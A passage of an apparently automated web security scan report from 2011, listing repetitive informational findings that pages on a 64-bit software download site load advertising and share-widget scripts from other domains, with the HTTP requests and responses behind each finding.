<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1323. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-autoposter-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-autoposter-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1324. http://www.x64bitdownload.com/64-bit-binaries-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binaries-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-binaries-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:17 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88854


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1325. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binary-downloader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-binary-downloader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A17%3A%22binary-downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A17%3A%22binary+downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1326. http://www.x64bitdownload.com/64-bit-binary-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binary-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-binary-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91309


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1327. http://www.x64bitdownload.com/64-bit-board-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-board-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-board-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:03 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1328. http://www.x64bitdownload.com/64-bit-boards-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-boards-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-boards-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1329. http://www.x64bitdownload.com/64-bit-client-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-client-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-client-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91161


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1330. http://www.x64bitdownload.com/64-bit-commander-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-commander-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-commander-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89024


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1331. http://www.x64bitdownload.com/64-bit-community-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-community-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-community-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1332. http://www.x64bitdownload.com/64-bit-complex-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-complex-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-complex-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85797


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1333. http://www.x64bitdownload.com/64-bit-conference-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-conference-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-conference-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88850


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1334. http://www.x64bitdownload.com/64-bit-cross-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-cross-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-cross-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90500


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1335. http://www.x64bitdownload.com/64-bit-download-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-download-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-download-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94324


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1336. http://www.x64bitdownload.com/64-bit-downloader-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-downloader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-downloader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98412


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
